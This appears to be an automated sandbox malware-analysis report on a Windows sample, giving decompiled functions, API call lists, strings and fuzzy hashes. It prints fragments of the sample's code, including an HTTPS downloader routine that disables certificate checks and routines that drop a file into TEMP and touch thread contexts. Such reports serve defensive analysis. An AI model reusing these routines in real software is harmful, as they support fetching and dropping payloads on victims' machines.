0x04007217
0x04007217
0x04007223
0x04007231
0x04007236
0x04007223
0x040071f5
0x040071c9
0x04007239
0x04007239
0x00000000
0x04007239
0x04006e1b
0x04006e22
0x04006e29
0x04006e39
0x04006eec
0x04006ef1
0x04006ef4
0x04006e3f
0x04006e4f
0x04006e65
0x04006e6c
0x04006e8c
0x04006e92
0x04006e97
0x04006e9a
0x04006ea6
0x04006ebb
0x04006eca
0x04006ecf
0x04006ecf
0x04006ea6
0x04006edd
0x04006edd
0x04006ee3
0x04006efb
0x04007012
0x00000000
0x04006f01
0x04006f08
0x04006f1c
0x04006f21
0x04006f21
0x04006f2d
0x04006f35
0x04006f3a
0x04006f3d
0x04006f49
0x04006f55
0x04006f83
0x04006f8b
0x04006fa1
0x04006fa6
0x04006fb2
0x04006fb2
0x04006f57
0x04006f5d
0x04006f65
0x04006f65
0x04006fbb
0x04006fc6
0x04006fcf
0x04006fe9
0x04006ff0
0x04006ff0
0x04006fbb
0x04006fff
0x0400700a
0x0400700f
0x00000000
0x04006fff

APIs

Sleep.KERNEL32(?), ref: 04006DC9
CoInitialize.OLE32(00000000), ref: 04006DD1
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
CreateThread.KERNEL32 ref: 04006FE3
CloseHandle.KERNEL32(?), ref: 04006FF0
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
GetTickCount.KERNEL32 ref: 04007059
GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
CloseHandle.KERNEL32(000000FF), ref: 040071BC
CoUninitialize.OLE32 ref: 04007239

Strings

TEMP, xrefs: 04007023

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
String ID: TEMP
API String ID: 3110491842-1036413054
Opcode ID: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
Opcode Fuzzy Hash: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04002900 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 133
networkfilestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				CHAR* _v28;
				char _v292;
				void _v296;
				void* _v300;
				long _v304;
				long _v308;
				char* _t54;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_t54 =  *0x400e004; // 0x400c398
					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
					if(_v12 != 0) {
						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
						if(_v16 != 0) {
							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
							if(_v20 != 0) {
								wsprintfA( &_v292, "https://%s", _a4);
								_v28 = "Accept: */*";
								_v24 = 4;
								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
								_v296 = _v296 | 0x0000b180;
								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
									_v308 = GetLastError();
								} else {
									_v300 = 0;
									while(_v300 < _a12) {
										_v304 = 0;
										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
										if(_v304 != 0) {
											_v300 = _v300 + _v304;
											 *(_a8 + _v300) = 0;
											continue;
										} else {
										}
										break;
									}
									_v8 = _v300;
								}
								InternetCloseHandle(_v20);
							}
							InternetCloseHandle(_v16);
						}
						InternetCloseHandle(_v12);
					}
				}
				return _v8;
			}

0x04002909
0x04002914
0x04002936
0x04002942
0x04002949
0x04002972
0x04002979
0x040029a3
0x040029aa
0x040029c0
0x040029c9
0x040029d0
0x040029e8
0x040029f9
0x04002a0e
0x04002a33
0x04002ab5
0x04002a35
0x04002a35
0x04002a3f
0x04002a4a
0x04002a73
0x04002a80
0x04002a90
0x04002a9f
0x00000000
0x00000000
0x04002a82
0x00000000
0x04002a80
0x04002aaa
0x04002aaa
0x04002acb
0x04002acb
0x04002ad5
0x04002ad5
0x04002adf
0x04002adf
0x04002949
0x04002aeb

APIs

InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
wsprintfA.USER32 ref: 040029C0
InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
GetLastError.KERNEL32 ref: 04002AAF
InternetCloseHandle.WININET(00000000), ref: 04002ACB
InternetCloseHandle.WININET(00000000), ref: 04002AD5
InternetCloseHandle.WININET(00000000), ref: 04002ADF

Strings

GET, xrefs: 04002994
1.1, xrefs: 0400298A
https://%s, xrefs: 040029B4

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
String ID: 1.1$GET$https://%s
API String ID: 2082764430-1670984264
Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00417503 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00417503() {
				char _v12;
				char _v16;
				char** _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v80;
				char* _v84;
				char* _v88;
				char* _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr* _t58;
				void* _t71;
				char* _t81;
				char* _t92;
				char* _t94;
				void* _t102;
				void* _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				char** _t116;

				asm("adc al, 0x42");
				es = _t114;
				 *_t58 =  *_t58 + _t58;
				_t116 = _t115 - 0x68;
				_v48 =  &_v12;
				 *_t116 =  &_v80;
				_v56 = E00418AA0;
				_v52 = 0x4191dc;
				_v44 = E00417690;
				_v40 = _t116;
				E0040E1A0(_t103 + _t103, _t107, _t114);
				if( *0x41ea6c != 0) {
					_v100 = 0x1d;
					_v104 = 1;
					 *_t116 = "terminate called recursively\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					abort();
					L8:
					 *_t116 = _v88;
					free(??);
					L5:
					_v76 = 1;
					E004189C0();
					L6:
					 *_t116 = _v88;
					fputs(??, ??);
					L4:
					_v100 = 2;
					_v104 = 1;
					 *_t116 = "\'\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					if(_v16 == 0) {
						goto L8;
					}
					goto L5;
				}
				 *0x41ea6c = 1;
				_t71 = E00418390();
				if(_t71 == 0) {
					_v100 = 0x2d;
					_v104 = 1;
					 *_t116 = "terminate called without an active exception\n";
					_v96 = __imp___iob + 0x40;
					_v76 = 0xffffffff;
					fwrite(??, ??, ??, ??);
					while(1) {
						_v76 = 0xffffffff;
						abort();
						E004183F0(_t102, _t112, _t113, _t114);
						_v76 = 0xffffffff;
						 *_t116 = _v88;
						E0040E810();
						_t107 = _t107 - 1;
						 *_t116 = _v88;
						if(_t107 != 0) {
							E00418140(_t102, _t112, _t113, _t114);
							_v76 = 0xffffffff;
							E004183F0(_t102, _t112, _t113, _t114);
						} else {
							_t81 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t102, _t112, _t113, _t114))) + 8))();
							_t109 = __imp___iob;
							_v100 = 0xb;
							_v104 = 1;
							 *_t116 = "  what():  ";
							_v76 = 2;
							_v88 = _t81;
							_t51 = _t109 + 0x40; // 0x76664640
							_v96 = _t51;
							fwrite(??, ??, ??, ??);
							_t107 = __imp___iob;
							_t53 = _t107 + 0x40; // 0x76664640
							_v104 = _t53;
							 *_t116 = _v88;
							fputs(??, ??);
							 *_t116 = 0xa;
							_v104 = __imp___iob + 0x40;
							fputc(??, ??);
							E004183F0(_t102, _t112, _t113, _t114);
						}
					}
				}
				_v100 = 0;
				_v104 = 0;
				_t92 =  *((intOrPtr*)(_t71 + 4)) + (0 |  *((char*)( *((intOrPtr*)(_t71 + 4)))) == 0x0000002a);
				_v84 = _t92;
				 *_t116 = _t92;
				_v96 =  &_v16;
				_v16 = 0xffffffff;
				_v76 = 0xffffffff;
				_t94 = E0040C8A0();
				_v100 = 0x30;
				_v104 = 1;
				 *_t116 = "terminate called after throwing an instance of \'";
				_v88 = _t94;
				_v96 = __imp___iob + 0x40;
				fwrite(??, ??, ??, ??);
				_v104 = __imp___iob + 0x40;
				if(_v16 == 0) {
					goto L6;
				}
				_v76 = 0xffffffff;
				 *_t116 = _v84;
				fputs(??, ??);
				goto L4;
			}

0x00417503
0x00417508
0x00417509
0x00417511
0x00417518
0x00417520
0x00417523
0x0041752b
0x00417533
0x0041753b
0x0041753f
0x0041754b
0x00417652
0x0041765a
0x00417662
0x0041766c
0x00417670
0x00417678
0x0041767d
0x00417682
0x00417686
0x00417689
0x00417632
0x00417632
0x0041763a
0x0041763f
0x00417643
0x00417646
0x004175fb
0x00417600
0x00417608
0x00417610
0x0041761a
0x0041761e
0x00417626
0x00417630
0x00000000
0x00000000
0x00000000
0x00417630
0x00417551
0x00417558
0x0041755f
0x004176b0
0x004176b8
0x004176c0
0x004176ca
0x004176ce
0x004176d6
0x004176db
0x004176db
0x004176e3
0x004176e8
0x004176f1
0x004176f9
0x004176fc
0x00417705
0x00417708
0x0041770b
0x00417790
0x00417795
0x0041779d
0x0041770d
0x00417716
0x00417719
0x0041771f
0x00417727
0x0041772f
0x00417736
0x0041773e
0x00417742
0x00417745
0x00417749
0x0041774e
0x00417754
0x00417757
0x0041775f
0x00417762
0x0041776c
0x00417776
0x0041777a
0x0041777f
0x0041777f
0x0041770b
0x004176db
0x0041756d
0x00417575
0x00417580
0x00417584
0x0041758c
0x0041758f
0x00417593
0x0041759b
0x004175a3
0x004175a8
0x004175b0
0x004175b8
0x004175bf
0x004175cb
0x004175cf
0x004175e1
0x004175e5
0x00000000
0x00000000
0x004175eb
0x004175f3
0x004175f6
0x00000000

APIs

fwrite.MSVCRT ref: 004175CF
fputs.MSVCRT ref: 004175F6
fwrite.MSVCRT ref: 00417626
fputs.MSVCRT ref: 00417646
fwrite.MSVCRT ref: 00417678
abort.MSVCRT ref: 0041767D
free.MSVCRT ref: 00417689
fwrite.MSVCRT ref: 004176D6
abort.MSVCRT ref: 004176E3
fwrite.MSVCRT ref: 00417749
fputs.MSVCRT ref: 00417762
fputc.MSVCRT ref: 0041777A

Strings

-, xrefs: 004176B0

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: fwrite$fputs$abort$fputcfree
String ID: -
API String ID: 4137898067-2547889144
Opcode ID: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
Instruction ID: 7c812a2032c8a6cafb97bb0affd1969c62a9733217d5893787fd2abbdd02fbd7
Opcode Fuzzy Hash: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
Instruction Fuzzy Hash: 9551F8B15083418FD310EF2AC54524ABBE0BF84328F448E2EE4E89B391D77D94858F8B

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 18.2, APIs: 12, Instructions: 176threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00412432
InterlockedIncrement.KERNEL32 ref: 00412492
SetEvent.KERNEL32 ref: 004124A5
InterlockedIncrement.KERNEL32 ref: 004124F7
SetEvent.KERNEL32 ref: 0041250A
SuspendThread.KERNEL32 ref: 00412560
WaitForSingleObject.KERNEL32 ref: 00412575
GetThreadContext.KERNEL32 ref: 00412592
SetThreadContext.KERNEL32(00000000,00000000), ref: 004125AE
InterlockedIncrement.KERNEL32(00000000), ref: 004125D7
SetEvent.KERNEL32(00000000), ref: 004125E8
ResumeThread.KERNEL32(00000000), ref: 004125FD

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Thread$EventIncrementInterlocked$Context$HandleInformationObjectResumeSingleSuspendWait
String ID:
API String ID: 2723890135-0
Opcode ID: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
Instruction ID: 8a0950f165c45e38fbf2d56c6a54e5c88b37052457152439e3475d81f3650815
Opcode Fuzzy Hash: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
Instruction Fuzzy Hash: A16180B06042009FCB10EF74DA886AABFF4EF04350F51496EEC95DB245D7B8D891CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00416080 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 004160BA
CreateSemaphoreA.KERNEL32 ref: 0041610E
CreateSemaphoreA.KERNEL32 ref: 00416135
InitializeCriticalSection.KERNEL32 ref: 00416154
InitializeCriticalSection.KERNEL32 ref: 0041615F
InitializeCriticalSection.KERNEL32 ref: 0041616A

Strings

l, xrefs: 004160AB

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID: l
API String ID: 2075313795-2517025534
Opcode ID: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
Instruction ID: 5e8c05b3caea3bf66dc60917ec76161f1da9a774c5b16c6f9788cc368daaae04
Opcode Fuzzy Hash: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
Instruction Fuzzy Hash: E63108B45043049FEB10BF69C58835ABBE4EF40314F15896DDC988B38AE779D498CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 16.7, APIs: 11, Instructions: 194sleepthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00412B11
Sleep.KERNEL32 ref: 00412B31
Sleep.KERNEL32 ref: 00412B47
_beginthreadex.MSVCRT ref: 00412BE1
SetThreadPriority.KERNEL32 ref: 00412C94
ResetEvent.KERNEL32 ref: 00412CA3
ResumeThread.KERNEL32 ref: 00412CBC
CloseHandle.KERNEL32 ref: 00412CC8

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
String ID:
API String ID: 3227561178-0
Opcode ID: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
Instruction ID: 4bf978c0dfbcc7ac22944fa4be84535112569abd23369c40f2ce7a8460ac5efa
Opcode Fuzzy Hash: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
Instruction Fuzzy Hash: 0781F5B06047058FD720DF69D68879ABBF0BB04310F104A2EE996C7790D378E895CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 180threadCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32 ref: 00410CEE
GetCurrentThreadId.KERNEL32 ref: 00410CF7
_setjmp3.MSVCRT ref: 00410D1F
CloseHandle.KERNEL32 ref: 00410D97
_endthreadex.MSVCRT(00000000,00000000), ref: 00410E04

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

Strings

h%, xrefs: 00410C98, 00410D26, 00410D50, 00410DEC, 00410E2C, 00410EC1, 00410F33, 00410F59, 00410F81
X%, xrefs: 00410CBE, 00410EE7

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
String ID: X%$h%
API String ID: 2387900098-2111123251
Opcode ID: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
Instruction ID: 069eecf464360b48a19cab1872b724955f5dbd0cfa50671f5b9cb90f7b6cbb53
Opcode Fuzzy Hash: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
Instruction Fuzzy Hash: 6181FBB0604305DFD710EF66D58469ABBF0BF44344F45882EE9858B352D7B8E9C2CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416640 Relevance: 13.6, APIs: 9, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00416640(intOrPtr* _a4) {
				void* _v16;
				char* _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v52;
				int _v56;
				char* _t35;
				char* _t37;
				intOrPtr _t40;
				char* _t41;
				int _t43;
				char* _t44;
				int _t45;
				int _t50;
				intOrPtr* _t61;
				intOrPtr* _t75;
				char* _t77;
				int _t79;
				int _t80;
				void* _t82;
				char** _t83;
				intOrPtr* _t86;
				intOrPtr* _t88;
				char** _t89;
				char** _t90;
				char** _t91;
				intOrPtr* _t92;

				_t79 = 0x16;
				_t83 = _t82 - 0x2c;
				_t75 = _a4;
				if(_t75 == 0) {
					L4:
					return _t79;
				} else {
					_t61 =  *_t75;
					if(_t61 == 0) {
						goto L4;
					} else {
						if(_t61 == 0xffffffff) {
							_t35 =  *0x422464; // 0x0
							__eflags = _t35;
							if(__eflags == 0) {
								_v52 = E00415C90;
								_v56 = 0x10;
								 *_t83 = "cond_locked_shmem_cond";
								_t35 = E00414330(__eflags);
								 *0x422464 = _t35;
							}
							 *_t83 = _t35;
							_t80 = 0x10;
							E00414700();
							__eflags =  *_t75 - 0xffffffff;
							if( *_t75 == 0xffffffff) {
								 *_t75 = 0;
								_t80 = 0;
							}
							_t37 =  *0x422464; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								_v52 = E00415C90;
								_v56 = 0x10;
								 *_t83 = "cond_locked_shmem_cond";
								_t37 = E00414330(__eflags);
								 *0x422464 = _t37;
							}
							 *_t83 = _t37;
							E00414660();
							return _t80;
						} else {
							_t40 = _t61 + 0x60;
							_v36 = _t40;
							_t41 = _t61 + 0x48;
							_v32 = _t41;
							_v56 = _t40;
							 *_t83 = _t41;
							_t43 = E00416590( *((intOrPtr*)(_t61 + 0x68)), 0xffffffff, 0);
							_t79 = _t43;
							if(_t43 == 0) {
								_t44 = _t61 + 0x14;
								_v40 = _t44;
								 *_t83 = _t44;
								_t45 = TryEnterCriticalSection(??);
								_t86 = _t83 - 4;
								__eflags = _t45;
								if(_t45 == 0) {
									_t79 = 0x10;
									 *_t86 = _v36;
									E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
								} else {
									__eflags =  *((intOrPtr*)(_t61 + 8)) -  *((intOrPtr*)(_t61 + 0x10));
									if( *((intOrPtr*)(_t61 + 8)) >  *((intOrPtr*)(_t61 + 0x10))) {
										L12:
										 *_t86 = _v36;
										_t50 = E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
										__eflags = _t50;
										_t79 =  ==  ? 0x10 : _t50;
										 *_t86 = _v40;
										LeaveCriticalSection(??);
									} else {
										_t79 =  *(_t61 + 4);
										__eflags = _t79;
										if(_t79 == 0) {
											 *_t75 = 0;
											 *_t86 = _v36;
											E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
											 *_t86 =  *((intOrPtr*)(_t61 + 0x64));
											CloseHandle(??);
											_t88 = _t86 - 4;
											 *_t88 =  *((intOrPtr*)(_t61 + 0x68));
											CloseHandle(??);
											_t77 = _v40;
											_t89 = _t88 - 4;
											 *_t89 = _t77;
											LeaveCriticalSection(??);
											_t90 = _t89 - 4;
											 *_t90 = _t77;
											DeleteCriticalSection(??);
											_t91 = _t90 - 4;
											 *_t91 = _v32;
											DeleteCriticalSection(??);
											_t92 = _t91 - 4;
											 *_t92 = _t61 + 0x2c;
											DeleteCriticalSection(??);
											 *_t61 = 0xc0deadbf;
											 *((intOrPtr*)(_t92 - 4)) = _t61;
											free(??);
										} else {
											goto L12;
										}
									}
								}
							}
							goto L4;
						}
					}
				}
			}

0x00416645
0x0041664b
0x0041664e
0x00416653
0x0041668c
0x00416695
0x00416655
0x00416655
0x00416659
0x00000000
0x0041665b
0x0041665e
0x00416696
0x0041669b
0x0041669d
0x00416806
0x0041680e
0x00416816
0x0041681d
0x00416822
0x00416822
0x004166a3
0x004166a6
0x004166ab
0x004166b0
0x004166b3
0x004167d0
0x004167d6
0x004167d6
0x004166b9
0x004166be
0x004166c0
0x004167e0
0x004167e8
0x004167f0
0x004167f7
0x004167fc
0x004167fc
0x004166c6
0x004166c9
0x004166d7
0x00416660
0x00416660
0x00416665
0x00416668
0x0041666d
0x00416673
0x00416679
0x00416681
0x00416688
0x0041668a
0x004166d8
0x004166db
0x004166de
0x004166e1
0x004166e7
0x004166ea
0x004166ec
0x00416736
0x00416740
0x00416748
0x004166ee
0x004166f1
0x004166f4
0x004166fd
0x00416708
0x0041670e
0x00416713
0x0041671c
0x00416722
0x00416725
0x004166f6
0x004166f6
0x004166f9
0x004166fb
0x0041675a
0x00416763
0x00416769
0x00416777
0x0041677a
0x0041677f
0x00416782
0x00416785
0x00416787
0x0041678a
0x0041678d
0x00416790
0x00416796
0x00416799
0x004167a2
0x004167a7
0x004167aa
0x004167ad
0x004167b2
0x004167b5
0x004167b8
0x004167ba
0x004167c3
0x004167c6
0x00000000
0x00000000
0x00000000
0x004166fb
0x004166f4
0x004166ec
0x00000000
0x0041668a
0x0041665e
0x00416659

APIs

TryEnterCriticalSection.KERNEL32 ref: 004166E1
LeaveCriticalSection.KERNEL32 ref: 00416725
CloseHandle.KERNEL32 ref: 0041677A
CloseHandle.KERNEL32 ref: 00416785
LeaveCriticalSection.KERNEL32 ref: 00416790
DeleteCriticalSection.KERNEL32 ref: 004167A2
DeleteCriticalSection.KERNEL32 ref: 004167AD
DeleteCriticalSection.KERNEL32 ref: 004167B8
free.MSVCRT ref: 004167C6

Part of subcall function 00416590: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
Part of subcall function 00416590: InterlockedDecrement.KERNEL32 ref: 004165B9
